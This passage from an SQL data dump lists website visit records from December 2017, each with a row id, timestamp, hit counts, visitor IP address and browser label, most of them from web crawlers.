,(189056,1513941583,1,1,0,0,'54.36.149.62','other'),(189057,1513941792,1,1,0,0,'40.77.167.173','other'),(189058,1513941799,1,1,0,0,'8.29.198.27','other'),(189059,1513941971,1,1,0,0,'91.196.178.129','chrome'),(189060,1513942061,1,1,0,0,'54.36.148.98','other'),(189061,1513942184,1,1,0,0,'54.36.149.49','other'),(189062,1513942626,1,1,0,0,'54.36.149.36','other'),(189063,1513942656,1,1,0,0,'54.36.149.47','other'),(189064,1513942725,1,1,0,0,'54.36.148.65','other'),(189065,1513942753,1,0,1,0,'66.249.75.28',''),(189066,1513942803,1,0,1,0,'66.249.69.35',''),(189067,1513943268,1,1,0,0,'217.69.133.247','other'),(189068,1513943330,1,1,0,0,'54.36.149.80','other'),(189069,1513943381,1,1,0,0,'54.36.148.134','other'),(189070,1513943582,1,1,0,0,'54.36.148.81','other'),(189071,1513943929,1,1,0,0,'51.255.71.127','other'),(189072,1513944129,1,1,0,0,'54.36.148.43','other'),(189073,1513944150,1,1,0,0,'207.46.13.105','other'),(189074,1513944171,1,1,0,0,'54.36.148.242','other'),(189075,1513944180,1,1,0,0,'94.179.147.128','chrome'),(189076,1513944244,1,1,0,0,'162.210.196.130','other'),(189077,1513944314,1,1,0,0,'54.36.148.127','other'),(189078,1513944468,1,1,0,0,'54.36.149.80','other'),(189079,1513944662,1,1,0,0,'51.255.71.132','other'),(189080,1513944671,1,1,0,0,'54.36.148.233','other'),(189081,1513944711,1,1,0,0,'54.36.149.84','other'),(189082,1513944757,1,1,0,0,'54.36.148.170','other'),(189083,1513944966,1,1,0,0,'54.36.148.197','other'),(189084,1513945035,1,1,0,0,'54.36.148.85','other'),(189085,1513945153,1,1,0,0,'185.46.148.130','chrome'),(189086,1513945406,1,1,0,0,'54.36.148.14','other'),(189087,1513945580,1,1,0,0,'54.36.148.207','other'),(189088,1513945955,1,1,0,0,'54.36.149.55','other'),(189089,1513946034,1,1,0,0,'54.36.148.238','other'),(189090,1513946077,1,1,0,0,'54.36.149.47','other'),(189091,1513946157,1,1,0,0,'95.132.17.125','firefox'),(189092,1513946232,1,1,0,0,'54.36.148.242','other'),(189093,1513946245,1,1,0,0,'54.36.148.245','other'),(189094,1513946312,1,1,0,0,'54.36.148.140','other'),(189095,1513946534,1,1,0,0,'217.69.133.245','other'),(189096,1513946613,1,1,0,0,'54.36.148.90','other'),(189097,1513946648,1,1,0,0,'54.36.148.180','other'),(189098,1513946778,1,1,0,0,'54.36.148.92','other'),(189099,1513946895,1,1,0,0,'54.36.148.172','other'),(189100,1513947018,1,1,0,0,'54.36.149.96','other'),(189101,1513947362,1,1,0,0,'54.36.149.35','other'),(189102,1513947378,1,1,0,0,'54.36.148.101','other'),(189103,1513947628,1,1,0,0,'54.36.149.64','other'),(189104,1513947856,1,1,0,0,'54.36.148.45','other'),(189105,1513947896,1,1,0,0,'54.36.149.84','other'),(189106,1513948015,1,1,0,0,'54.36.148.68','other'),(189107,1513948200,1,1,0,0,'217.69.133.230','other'),(189108,1513948375,1,1,0,0,'54.36.149.7','other'),(189109,1513948519,1,1,0,0,'54.36.148.200','other'),(189110,1513948864,1,1,0,0,'54.36.148.198','other'),(189111,1513948922,1,0,1,0,'66.249.69.35',''),(189112,1513949201,1,1,0,0,'54.36.148.251','other'),(189113,1513949260,1,1,0,0,'66.249.75.28','chrome'),(189114,1513949458,1,1,0,0,'54.36.149.19','other'),(189115,1513949616,1,1,0,0,'54.36.148.27','other'),(189116,1513949627,1,1,0,0,'54.36.149.37','other'),(189117,1513949697,1,1,0,0,'217.69.133.222','other'),(189118,1513949742,1,1,0,0,'217.69.133.235','other'),(189119,1513949903,1,1,0,0,'93.77.26.209','chrome'),(189120,1513950004,1,1,0,0,'141.8.142.74','other'),(189121,1513950460,1,1,0,0,'54.36.148.167','other'),(189122,1513950499,1,1,0,0,'54.36.148.98','other'),(189123,1513950597,1,1,0,0,'54.36.149.82','other'),(189124,1513950630,1,1,0,0,'54.36.148.118','other'),(189125,1513951182,1,1,0,0,'54.36.148.169','other'),(189126,1513951249,1,1,0,0,'54.36.148.172','other'),(189127,1513951316,1,1,0,0,'54.36.148.205','other'),(189128,1513951956,1,1,0,0,'157.55.39.203','other'),(189129,1513952642,1,1,0,0,'54.36.148.190','other'),(189130,1513952644,1,1,0,0,'8.29.198.26','other'),(189131,1513953154,1,1,0,0,'54.36.148.56','other'),(189132,1513953191,1,1,0,0,'54.36.148.62','other'),(189133,1513953398,1,1,0,0,'54.36.148.23','other'),(189134,1513953580,1,1,0,0,'54.36.148.71','other'),(189135,1513953796,1,1,0,0,'54.36.148.194','other'),(189136,1513953996,1,1,0,0,'54.36.148.180','other'),(189137,1513954303,1,1,0,0,'54.36.148.241','other'),(189138,1513954342,1,1,0,0,'54.36.149.46','other'),(189139,1513954368,1,1,0,0,'54.36.148.179','other'),(189140,1513954385,1,1,0,0,'54.36.148.178','other'),(189141,1513954576,1,1,0,0,'141.8.142.74','other'),(189142,1513954577,1,1,0,0,'178.154.171.88','other'),(189143,1513954624,1,1,0,0,'82.145.220.185','chrome'),(189144,1513954962,1,1,0,0,'54.36.148.123','other'),(189145,1513955175,1,1,0,0,'54.36.149.4','other'),(189146,1513955259,1,1,0,0,'35.225.221.87','other'),(189147,1513955419,1,0,1,0,'66.249.69.41',''),(189148,1513955453,1,1,0,0,'217.69.133.68','other'),(189149,1513955471,1,1,0,0,'54.36.148.17','other'),(189150,1513955499,1,1,0,0,'217.69.133.225','other'),(189151,1513955827,1,1,0,0,'54.36.148.232','other'),(189152,1513955963,1,1,0,0,'54.36.148.175','other'),(189153,1513956051,1,1,0,0,'91.196.178.70','chrome'),(189154,1513956173,1,1,0,0,'66.249.69.41','chrome'),(189155,1513956362,2,2,0,0,'40.77.167.111','other'),(189156,1513956381,1,1,0,0,'54.36.149.10','other'),(189157,1513956489,1,1,0,0,'77.111.244.47','chrome'),(189158,1513956649,1,1,0,0,'184.75.209.90','chrome'),(189159,1513957048,1,1,0,0,'54.36.149.74','other'),(189160,1513957079,1,1,0,0,'54.36.148.18','other'),(189161,1513957115,1,1,0,0,'54.36.149.23','other'),(189162,1513957211,1,1,0,0,'51.255.71.132','other'),(189163,1513957353,1,1,0,0,'54.36.148.66','other'),(189164,1513957367,1,1,0,0,'157.55.39.203','other'),(189165,1513957766,1,0,1,0,'66.249.69.39',''),(189166,1513957933,1,1,0,0,'54.36.148.61','other'),(189167,1513957949,1,1,0,0,'66.249.75.30','chrome'),(189168,1513957981,1,1,0,0,'217.69.133.235','other'),(189169,1513958112,1,1,0,0,'54.36.148.67','other'),(189170,1513958187,1,1,0,0,'54.36.148.234','other'),(189171,1513958212,2,2,0,0,'178.154.171.88','other'),(189172,1513958282,1,1,0,0,'51.255.71.119','other'),(189173,1513958466,1,1,0,0,'54.36.148.148','other'),(189174,1513958564,1,1,0,0,'54.36.148.112','other'),(189175,1513958964,2,2,0,0,'141.8.132.19','other'),(189176,1513959002,1,1,0,0,'54.36.149.67','other'),(189177,1513959039,1,1,0,0,'54.36.148.172','other'),(189178,1513959102,1,1,0,0,'54.36.149.40','other'),(189179,1513959368,1,1,0,0,'54.36.149.19','other'),(189180,1513959532,1,1,0,0,'66.249.75.29','chrome'),(189181,1513959894,1,1,0,0,'54.36.148.168','other'),(189182,1513960138,2,2,0,0,'87.250.224.46','other'),(189183,1513960461,1,1,0,0,'37.9.113.182','other'),(189184,1513960491,1,1,0,0,'51.255.71.118','other'),(189185,1513960787,1,1,0,0,'178.92.74.238','chrome'),(189186,1513960886,1,1,0,0,'217.69.133.231','other'),(189187,1513961009,1,1,0,0,'54.36.149.6','other'),(189188,1513961300,1,0,1,0,'66.249.75.28',''),(189189,1513961489,2,2,0,0,'141.8.142.74','other'),(189190,1513961783,1,1,0,0,'54.36.148.134','other'),(189191,1513961825,1,1,0,0,'54.36.148.121','other'),(189192,1513961983,1,0,1,0,'66.249.69.41',''),(189193,1513962188,1,1,0,0,'178.154.171.88','other'),(189194,1513962478,1,1,0,0,'141.8.142.74','other'),(189195,1513962757,1,1,0,0,'217.69.133.220','other'),(189196,1513962846,1,1,0,0,'54.36.148.96','other'),(189197,1513962891,1,1,0,0,'66.249.69.35','chrome'),(189198,1513962943,1,1,0,0,'54.36.148.234','other'),(189199,1513963059,1,1,0,0,'54.36.148.31','other'),(189200,1513963178,1,1,0,0,'54.36.148.74','other'),(189201,1513963347,1,1,0,0,'54.36.148.86','other'),(189202,1513963479,1,1,0,0,'8.29.198.27','other'),(189203,1513963634,1,1,0,0,'87.250.224.46','other'),(189204,1513963711,1,1,0,0,'178.92.74.238','chrome'),(189205,1513963725,1,1,0,0,'54.36.149.21','other'),(189206,1513963787,2,2,0,0,'40.77.167.111','other'),(189207,1513963801,1,1,0,0,'54.36.148.145','other'),(189208,1513963857,1,1,0,0,'54.36.149.87','other'),(189209,1513963953,1,1,0,0,'31.13.113.173','other'),(189210,1513963958,1,1,0,0,'31.13.113.189','other'),(189211,1513963959,1,1,0,0,'31.13.113.197','other'),(189213,1513963960,1,1,0,0,'31.13.110.122','other'),(189214,1513963964,1,1,0,0,'173.252.91.249','other'),(189215,1513963974,1,1,0,0,'54.36.148.205','other'),(189216,1513964021,1,1,0,0,'37.9.113.182','other'),(189217,1513964075,1,1,0,0,'94.244.18.38','chrome'),(189218,1513964365,1,1,0,0,'54.36.149.19','other'),(189219,1513964367,1,1,0,0,'54.36.148.23','other'),(189220,1513964455,2,2,0,0,'54.36.149.5','other'),(189221,1513964462,1,1,0,0,'54.36.148.35','other'),(189222,1513964693,1,1,0,0,'54.36.149.47','other'),(189224,1513964704,1,1,0,0,'54.36.149.41','other'),(189225,1513964732,1,1,0,0,'54.36.149.2','other'),(189226,1513964738,2,2,0,0,'178.154.171.88','other'),(189227,1513964742,1,1,0,0,'54.36.148.139','other'),(189228,1513964807,1,1,0,0,'54.36.148.170','other'),(189229,1513964852,1,1,0,0,'141.8.142.74','other'),(189231,1513964948,1,1,0,0,'95.158.43.26','chrome'),(189232,1513964982,1,1,0,0,'91.196.178.50','chrome'),(189233,1513965021,1,1,0,0,'54.36.148.230','other'),(189234,1513965133,1,1,0,0,'40.77.167.111','other'),(189235,1513965349,1,1,0,0,'192.81.223.221','chrome'),(189236,1513965399,1,1,0,0,'54.36.148.88','other'),(189237,1513965411,1,1,0,0,'54.36.149.9','other'),(189238,1513965543,1,1,0,0,'87.76.241.252','firefox'),(189239,1513965775,1,1,0,0,'207.46.13.103','other'),(189240,1513965795,1,1,0,0,'54.36.149.37','other'),(189241,1513965953,2,2,0,0,'178.92.249.141','chrome'),(189242,1513965995,1,1,0,0,'54.36.149.65','other'),(189243,1513966081,1,1,0,0,'91.196.178.135','chrome'),(189244,1513966208,1,1,0,0,'217.69.133.223','other'),(189245,1513966383,1,1,0,0,'54.36.148.246','other'),(189246,1513966438,1,1,0,0,'54.36.149.85','other'),(189247,1513966450,1,1,0,0,'184.75.209.90','chrome'),(189248,1513967064,1,1,0,0,'54.36.148.133','other'),(189249,1513967221,1,1,0,0,'54.36.148.130','other'),(189250,1513967260,1,1,0,0,'54.36.148.82','other'),(189251,1513967814,1,1,0,0,'40.77.167.111','other'),(189252,1513967866,1,1,0,0,'54.36.148.16','other'),(189253,1513967986,1,1,0,0,'54.36.148.202','other'),(189254,1513968016,1,1,0,0,'54.36.148.252','other'),(189255,1513968085,1,1,0,0,'54.36.148.173','other'),(189256,1513968422,1,0,1,0,'66.249.75.29',''),(189257,1513968560,1,1,0,0,'54.36.148.130','other'),(189258,1513969003,1,1,0,0,'217.69.133.223','other'),(189259,1513969049,1,1,0,0,'54.36.148.181','other'),(189260,1513969265,1,1,0,0,'178.62.238.64','chrome'),(189261,1513969318,1,1,0,0,'54.36.148.161','other'),(189262,1513969606,1,1,0,0,'54.36.148.241','other'),(189263,1513969858,1,1,0,0,'54.36.148.168','other'),(189264,1513969914,1,1,0,0,'54.36.148.186','other'),(189265,1513970176,1,1,0,0,'54.36.148.81','other'),(189266,1513970177,1,1,0,0,'37.73.245.43','chrome'),(189267,1513970234,1,1,0,0,'54.36.148.140','other'),(189268,1513970247,2,2,0,0,'141.8.142.74','other'),(189269,1513970307,1,1,0,0,'54.36.149.62','other'),(189270,1513970436,2,2,0,0,'54.36.149.96','other'),(189271,1513970512,1,1,0,0,'37.190.163.241','chrome'),(189272,1513970850,1,0,1,0,'66.249.69.39',''),(189273,1513971079,1,1,0,0,'178.154.171.88','other'),(189274,1513971381,1,1,0,0,'54.36.148.202','other'),(189275,1513971523,3,3,0,0,'141.8.142.74','other'),(189276,1513971668,1,1,0,0,'54.36.149.22','other'),(189277,1513971868,1,1,0,0,'217.69.136.205','other'),(189278,1513972129,1,1,0,0,'54.36.149.24','other'),(189279,1513972171,1,1,0,0,'54.36.148.167','other'),(189280,1513972243,1,1,0,0,'54.36.148.52','other'),(189281,1513972338,1,1,0,0,'54.36.149.79','other'),(189282,1513972340,1,1,0,0,'54.36.149.14','other'),(189283,1513972377,1,1,0,0,'54.36.148.163','other'),(189284,1513972434,1,1,0,0,'54.36.149.30','other'),(189285,1513972447,1,1,0,0,'54.36.148.153','other'),(189286,1513972539,1,1,0,0,'217.69.136.206','other'),(189287,1513972834,3,3,0,0,'141.8.142.74','other'),(189288,1513973059,1,0,1,0,'66.249.69.35',''),(189289,1513973287,1,1,0,0,'54.36.149.56','other'),(189290,1513973517,1,1,0,0,'54.36.148.200','other'),(189291,1513973527,1,1,0,0,'217.69.133.23','other'),(189292,1513973540,1,1,0,0,'54.36.148.186','other'),(189293,1513973571,1,1,0,0,'54.36.148.17','other'),(189294,1513973650,1,1,0,0,'217.69.133.239','other'),(189295,1513973723,1,1,0,0,'82.145.222.136','chrome'),(189296,1513973799,1,1,0,0,'31.13.105.115','other'),(189297,1513973814,5,5,0,0,'141.8.142.74','other'),(189298,1513974151,1,1,0,0,'54.36.149.91','other'),(189299,1513974159,1,1,0,0,'46.211.66.131','chrome'),(189300,1513974174,1,1,0,0,'192.81.223.221','chrome'),(189301,1513974231,2,2,0,0,'54.36.148.82','other'),(189302,1513974253,1,0,1,0,'66.249.64.29',''),(189303,1513974334,1,1,0,0,'8.29.198.26','other'),(189304,1513974494,1,1,0,0,'82.145.220.185','chrome'),(189305,1513974507,2,2,0,0,'178.92.74.238','chrome'),(189306,1513974523,2,2,0,0,'178.154.171.88','other'),(189307,1513974766,1,1,0,0,'107.167.108.83','other'),(189308,1513974831,1,1,0,0,'54.36.149.71','other'),(189309,1513975040,1,1,0,0,'54.36.148.139','other'),(189310,1513975061,1,1,0,0,'54.36.148.59','other'),(189311,1513975818,1,1,0,0,'51.255.71.114','other'),(189312,1513975856,1,1,0,0,'54.36.148.231','other'),(189313,1513976223,1,1,0,0,'54.36.148.47','other'),(189314,1513976526,1,1,0,0,'54.36.148.252','other'),(189315,1513976741,1,1,0,0,'51.255.71.127','other'),(189316,1513976902,1,1,0,0,'178.154.171.88','other'),(189317,1513976955,1,1,0,0,'54.36.148.207','other'),(189318,1513976993,1,1,0,0,'54.36.148.238','other'),(189319,1513977102,1,1,0,0,'54.36.149.53','other'),(189320,1513977141,1,1,0,0,'54.36.148.72','other'),(189321,1513977194,2,2,0,0,'141.8.142.74','other'),(189322,1513977203,1,1,0,0,'194.187.170.140','other'),(189323,1513977289,1,1,0,0,'192.81.223.221','chrome'),(189324,1513977325,1,1,0,0,'178.92.48.27','chrome'),(189325,1513977389,1,1,0,0,'54.36.148.198','other'),(189326,1513977426,1,1,0,0,'54.36.148.233','other'),(189327,1513977754,1,1,0,0,'51.255.71.118','other'),(189328,1513977815,1,1,0,0,'54.36.148.73','other'),(189329,1513978456,1,1,0,0,'54.36.148.24','other'),(189330,1513978533,1,1,0,0,'54.36.149.83','other'),(189331,1513978648,1,1,0,0,'54.36.148.70','other'),(189332,1513978721,1,1,0,0,'54.36.149.26','other'),(189333,1513979015,1,1,0,0,'37.73.224.11','chrome'),(189334,1513979113,1,1,0,0,'54.36.148.87','other'),(189335,1513979272,2,2,0,0,'178.154.171.88','other'),(189336,1513979363,1,1,0,0,'54.36.148.52','other'),(189337,1513979369,1,0,1,0,'66.249.64.28',''),(189338,1513979414,1,1,0,0,'54.36.149.106','other'),(189339,1513979490,1,1,0,0,'54.36.149.15','other'),(189340,1513979645,1,1,0,0,'37.9.113.110','other'),(189341,1513979858,1,1,0,0,'54.36.149.71','other'),(189342,1513979862,1,1,0,0,'207.46.13.105','other'),(189343,1513979886,1,1,0,0,'54.36.148.88','other'),(189344,1513979890,1,1,0,0,'54.36.148.177','other'),(189345,1513979970,1,1,0,0,'54.36.149.104','other'),(189346,1513980028,1,1,0,0,'54.36.148.24','other'),(189347,1513980124,1,1,0,0,'95.132.61.48','chrome'),(189348,1513980415,1,1,0,0,'54.36.148.150','other'),(189349,1513980418,1,1,0,0,'54.36.149.87','other'),(189350,1513980546,2,2,0,0,'178.154.171.88','other'),(189351,1513980640,2,2,0,0,'54.165.59.7','other'),(189352,1513980729,1,1,0,0,'87.250.224.46','other'),(189353,1513981009,1,1,0,0,'54.36.148.191','other'),(189354,1513981116,1,1,0,0,'54.36.148.26','other'),(189355,1513981364,1,1,0,0,'54.36.148.115','other'),(189356,1513981565,1,1,0,0,'54.36.148.208','other'),(189357,1513981714,1,1,0,0,'54.36.148.192','other'),(189358,1513981984,4,4,0,0,'193.70.39.161','other'),(189359,1513982043,2,2,0,0,'141.8.142.74','other'),(189360,1513982212,1,1,0,0,'54.36.148.104','other'),(189361,1513982784,1,1,0,0,'54.36.148.191','other'),(189362,1513982834,1,1,0,0,'54.36.149.21','other'),(189363,1513983086,1,1,0,0,'54.36.148.166','other'),(189364,1513983321,1,1,0,0,'54.36.148.34','other'),(189365,1513983375,1,1,0,0,'217.69.133.30','other'),(189366,1513983549,1,1,0,0,'54.36.148.76','other'),(189367,1513983617,1,1,0,0,'54.36.149.74','other'),(189368,1513983623,1,1,0,0,'91.196.178.161','chrome'),(189369,1513983631,2,2,0,0,'141.8.142.74','other'),(189370,1513983869,1,1,0,0,'54.36.148.79','other'),(189371,1513984112,1,1,0,0,'40.77.167.111','other'),(189372,1513984185,1,1,0,0,'54.36.149.31','other'),(189373,1513984217,1,1,0,0,'109.173.107.214','chrome'),(189374,1513984422,1,1,0,0,'54.36.149.78','other'),(189375,1513984585,1,1,0,0,'54.36.148.74','other'),(189376,1513984982,1,1,0,0,'54.36.148.150','other'),(189377,1513984988,1,1,0,0,'141.8.142.74','other'),(189378,1513985174,1,1,0,0,'8.29.198.26','other'),(189379,1513985513,1,1,0,0,'54.36.148.55','other'),(189380,1513985797,1,1,0,0,'54.36.148.107','other'),(189381,1513986291,1,1,0,0,'54.36.149.18','other'),(189382,1513986519,1,1,0,0,'54.36.148.141','other'),(189383,1513986696,1,1,0,0,'54.36.149.36','other'),(189384,1513986734,1,1,0,0,'54.36.149.78','other'),(189385,1513986819,1,1,0,0,'54.36.148.46','other'),(189386,1513987213,1,1,0,0,'54.36.149.44','other'),(189387,1513987393,1,1,0,0,'217.69.136.209','other'),(189388,1513988186,1,1,0,0,'54.36.149.4','other'),(189389,1513988432,1,1,0,0,'54.36.149.46','other'),(189390,1513988564,1,1,0,0,'54.36.148.155','other'),(189391,1513989103,1,0,1,0,'66.249.64.30',''),(189392,1513989558,1,1,0,0,'54.36.149.6','other'),(189393,1513989703,1,1,0,0,'54.36.149.43','other'),(189394,1513989782,1,1,0,0,'54.36.148.87','other'),(189395,1513989792,2,0,2,0,'66.249.64.28',''),(189396,1513989859,2,2,0,0,'157.55.39.203','other'),(189397,1513989889,1,1,0,0,'54.36.148.150','other'),(189398,1513989937,1,1,0,0,'54.36.148.79','other'),(189399,1513990620,1,0,1,0,'66.249.64.29',''),(189400,1513990740,1,1,0,0,'54.36.149.94','other'),(189401,1513990892,1,1,0,0,'54.36.148.207','other'),(189402,1513990932,1,0,1,0,'66.249.64.30',''),(189403,1513990986,1,1,0,0,'54.36.148.42','other'),(189404,1513991022,1,1,0,0,'54.36.148.239','other'),(189405,1513991102,2,0,2,0,'66.249.64.28',''),(189406,1513991414,1,1,0,0,'54.36.148.32','other'),(189407,1513991436,1,1,0,0,'51.255.71.129','other'),(189408,1513991668,1,1,0,0,'54.36.148.88','other'),(189409,1513991713,1,1,0,0,'54.36.149.7','other'),(189410,1513991781,1,1,0,0,'54.36.148.162','other'),(189411,1513991783,1,1,0,0,'51.255.71.114','other'),(189412,1513992366,1,1,0,0,'54.36.148.134','other'),(189413,1513992659,1,1,0,0,'54.36.148.128','other'),(189414,1513992851,1,1,0,0,'51.255.71.121','other'),(189415,1513992991,1,1,0,0,'54.36.148.10','other'),(189416,1513993037,1,1,0,0,'54.36.148.159','other'),(189417,1513993083,1,1,0,0,'217.69.136.209','other'),(189418,1513993085,1,1,0,0,'54.36.149.1','other'),(189419,1513993169,1,1,0,0,'54.36.148.201','other'),(189420,1513993365,1,1,0,0,'54.36.148.57','other'),(189421,1513993433,1,1,0,0,'54.36.148.108','other'),(189422,1513993962,1,1,0,0,'54.36.148.231','other'),(189423,1513994027,1,1,0,0,'141.8.142.74','other'),(189424,1513994350,1,1,0,0,'54.36.148.56','other'),(189425,1513994595,1,1,0,0,'54.36.148.124','other'),(189426,1513994618,1,1,0,0,'207.46.13.103','other'),(189427,1513995025,1,1,0,0,'54.36.149.79','other'),(189428,1513995085,1,1,0,0,'37.9.113.115','other'),(189429,1513995432,1,1,0,0,'54.36.149.31','other'),(189430,1513995513,1,1,0,0,'54.36.149.40','other'),(189431,1513995656,1,1,0,0,'51.255.71.114','other'),(189432,1513995662,1,1,0,0,'54.36.148.91','other'),(189433,1513995763,1,1,0,0,'37.204.157.236','msie'),(189434,1513995968,2,2,0,0,'207.46.13.105','other'),(189435,1513996010,1,1,0,0,'8.29.198.27','other'),(189436,1513996055,3,3,0,0,'66.249.64.28','chrome'),(189437,1513996078,1,0,1,0,'66.249.64.29',''),(189438,1513996460,1,1,0,0,'217.69.133.242','other'),(189439,1513997150,1,1,0,0,'54.36.148.44','other'),(189440,1513997275,1,1,0,0,'54.36.148.183','other'),(189441,1513997556,1,1,0,0,'54.165.59.7','other'),(189442,1513998078,1,1,0,0,'141.8.142.74','other'),(189443,1513998210,1,1,0,0,'207.46.13.103','other'),(189444,1513998332,1,1,0,0,'13.56.229.65','chrome'),(189445,1513998769,1,1,0,0,'54.36.148.71','other'),(189446,1513998978,1,1,0,0,'54.36.148.124','other'),(189447,1513999027,1,1,0,0,'54.36.148.161','other'),(189448,1513999420,1,1,0,0,'51.255.71.125','other'),(189449,1513999527,2,2,0,0,'141.8.142.74','other'),(189450,1513999595,1,1,0,0,'54.36.148.17','other'),(189451,1513999713,1,1,0,0,'54.36.148.86','other'),(189452,1513999944,1,1,0,0,'157.55.39.203','other'),(189453,1513999951,1,1,0,0,'54.36.148.31','other'),(189454,1514000122,1,1,0,0,'54.36.149.56','other'),(189455,1514000429,1,1,0,0,'54.36.149.54','other'),(189456,1514000748,1,1,0,0,'87.250.224.46','other'),(189457,1514000850,1,1,0,0,'178.154.171.88','other'),(189458,1514000881,1,1,0,0,'54.36.148.124','other'),(189459,1514000889,1,1,0,0,'51.255.71.126','other'),(189460,1514000920,3,1,2,0,'66.249.64.30',''),(189461,1514000977,2,0,2,0,'66.249.64.28',''),(189462,1514001025,1,1,0,0,'54.36.148.189','other'),(189463,1514001035,1,1,0,0,'217.69.136.205','other'),(189464,1514001088,1,1,0,0,'54.36.148.60','other'),(189465,1514001188,1,1,0,0,'54.36.149.5','other'),(189466,1514001805,1,1,0,0,'54.36.148.242','other'),(189467,1514001836,2,2,0,0,'54.36.149.82','other'),(189468,1514001917,1,1,0,0,'54.36.148.197','other'),(189469,1514002237,1,1,0,0,'54.36.148.22','other'),(189470,1514002265,1,1,0,0,'51.255.71.114','other'),(189471,1514002344,1,1,0,0,'54.36.148.193','other'),(189472,1514002371,1,1,0,0,'54.36.148.15','other'),(189473,1514002413,1,1,0,0,'54.36.148.164','other'),(189474,1514002598,1,1,0,0,'54.36.148.151','other'),(189475,1514002601,1,1,0,0,'54.36.148.250','other'),(189476,1514002853,1,1,0,0,'66.249.64.28','chrome'),(189477,1514002981,1,1,0,0,'54.36.148.141','other'),(189478,1514003191,1,1,0,0,'54.36.148.110','other'),(189479,1514003229,1,1,0,0,'51.255.71.126','other'),(189480,1514003260,1,1,0,0,'78.111.187.189','firefox'),(189481,1514003473,1,1,0,0,'54.36.149.66','other'),(189482,1514003768,1,1,0,0,'54.36.148.40','other'),(189483,1514003853,1,1,0,0,'54.36.148.138','other'),(189484,1514003992,1,1,0,0,'54.36.149.62','other'),(189485,1514004203,1,1,0,0,'141.8.142.74','other'),(189486,1514004215,1,1,0,0,'54.36.148.55','other'),(189487,1514004278,1,1,0,0,'54.36.148.248','other'),(189488,1514004310,1,1,0,0,'54.36.148.133','other'),(189489,1514004369,1,1,0,0,'217.69.136.204','other'),(189490,1514004476,1,1,0,0,'82.145.223.87','chrome'),(189491,1514004529,1,1,0,0,'180.76.15.9','other'),(189492,1514005156,1,1,0,0,'54.36.148.59','other'),(189493,1514005730,1,1,0,0,'54.36.149.35','other'),(189494,1514005814,1,1,0,0,'54.36.148.34','other'),(189495,1514005847,1,1,0,0,'54.36.148.229','other'),(189496,1514005918,1,1,0,0,'141.8.142.74','other'),(189497,1514005923,1,1,0,0,'54.36.148.243','other'),(189498,1514006063,1,1,0,0,'54.36.148.180','other'),(189499,1514006165,1,1,0,0,'54.36.148.17','other'),(189500,1514006183,1,1,0,0,'54.165.59.7','other'),(189501,1514006533,1,1,0,0,'178.154.171.88','other'),(189502,1514006548,1,1,0,0,'54.36.148.158','other'),(189503,1514006854,1,1,0,0,'8.29.198.25','other'),(189504,1514006900,1,1,0,0,'54.36.148.66','other'),(189505,1514007197,1,1,0,0,'54.36.148.120','other'),(189506,1514007290,1,1,0,0,'54.36.148.90','other'),(189507,1514007593,1,1,0,0,'54.36.148.20','other'),(189508,1514007787,1,1,0,0,'54.36.148.247','other'),(189509,1514008135,1,1,0,0,'40.77.167.111','other'),(189510,1514008211,1,1,0,0,'46.42.172.221','msie'),(189511,1514008223,1,1,0,0,'54.36.148.142','other'),(189512,1514008315,1,1,0,0,'54.36.148.91','other'),(189513,1514008339,1,1,0,0,'207.46.13.103','other'),(189514,1514008392,1,1,0,0,'54.36.149.22','other'),(189515,1514008471,1,1,0,0,'54.36.148.232','other'),(189516,1514008555,1,1,0,0,'87.250.224.46','other'),(189517,1514009156,1,1,0,0,'54.36.149.97','other'),(189518,1514009158,1,1,0,0,'54.36.148.177','other'),(189519,1514009352,1,1,0,0,'141.8.142.74','other'),(189520,1514009602,1,1,0,0,'54.36.148.10','other'),(189521,1514009690,1,1,0,0,'217.69.133.72','other'),(189522,1514009790,1,1,0,0,'54.36.148.175','other'),(189523,1514009814,1,1,0,0,'178.154.171.88','other'),(189524,1514009864,1,1,0,0,'35.225.221.87','other'),(189525,1514010175,1,1,0,0,'54.36.148.185','other'),(189526,1514010840,1,1,0,0,'54.36.149.99','other'),(189527,1514010969,1,1,0,0,'54.36.149.75','other'),(189528,1514011030,1,1,0,0,'207.46.13.103','other'),(189529,1514011155,1,1,0,0,'141.8.142.74','other'),(189530,1514011247,1,1,0,0,'54.36.148.108','other'),(189531,1514011386,1,1,0,0,'54.36.149.26','other'),(189532,1514011391,1,1,0,0,'54.36.149.87','other'),(189533,1514011392,1,1,0,0,'95.158.36.190','other'),(189534,1514011400,1,1,0,0,'176.193.118.200','chrome'),(189535,1514011471,1,1,0,0,'54.36.148.160','other'),(189536,1514011960,1,1,0,0,'54.36.148.123','other'),(189537,1514012020,1,1,0,0,'54.36.148.242','other'),(189538,1514012053,1,1,0,0,'54.36.148.178','other'),(189539,1514012213,1,1,0,0,'54.36.149.96','other'),(189540,1514012430,2,2,0,0,'66.249.64.29','chrome'),(189541,1514012591,1,1,0,0,'51.255.71.122','other'),(189542,1514012664,1,1,0,0,'51.255.71.128','other'),(189543,1514012776,1,1,0,0,'178.154.171.88','other'),(189544,1514012823,1,1,0,0,'54.36.149.25','other'),(189545,1514012924,2,2,0,0,'54.36.149.61','other'),(189546,1514012978,1,1,0,0,'54.36.148.159','other'),(189547,1514013055,1,1,0,0,'157.55.39.101','other'),(189548,1514013330,1,1,0,0,'54.36.148.189','other'),(189549,1514013672,1,1,0,0,'54.36.148.254','other'),(189550,1514013683,2,2,0,0,'54.36.148.51','other'),(189551,1514013700,1,1,0,0,'54.36.149.66','other'),(189552,1514013866,1,1,0,0,'66.249.64.30','chrome'),(189553,1514013924,1,1,0,0,'66.249.64.28','chrome'),(189554,1514014225,2,2,0,0,'35.225.221.87','other'),(189555,1514014726,1,1,0,0,'54.36.149.47','other'),(189556,1514014739,1,1,0,0,'54.36.149.71','other'),(189557,1514014969,1,1,0,0,'54.36.148.164','other'),(189558,1514015128,1,1,0,0,'37.9.113.74','other'),(189559,1514015364,1,1,0,0,'217.69.133.248','other'),(189560,1514015765,1,1,0,0,'5.228.58.80','msie'),(189561,1514015834,1,1,0,0,'157.55.39.101','other'),(189562,1514015922,1,1,0,0,'46.211.127.60','chrome'),(189563,1514016026,1,1,0,0,'54.36.148.34','other'),(189564,1514016153,1,1,0,0,'54.36.149.54','other'),(189565,1514016214,1,1,0,0,'178.92.74.238','chrome'),(189566,1514016535,1,1,0,0,'54.36.149.23','other'),(189567,1514016598,1,1,0,0,'54.36.148.87','other'),(189568,1514016661,1,1,0,0,'54.36.148.173','other'),(189569,1514016767,1,1,0,0,'51.255.71.113','other'),(189570,1514016885,1,1,0,0,'54.36.148.41','other'),(189571,1514016982,1,1,0,0,'54.36.148.252','other'),(189572,1514017051,1,1,0,0,'51.255.71.123','other'),(189573,1514017273,1,1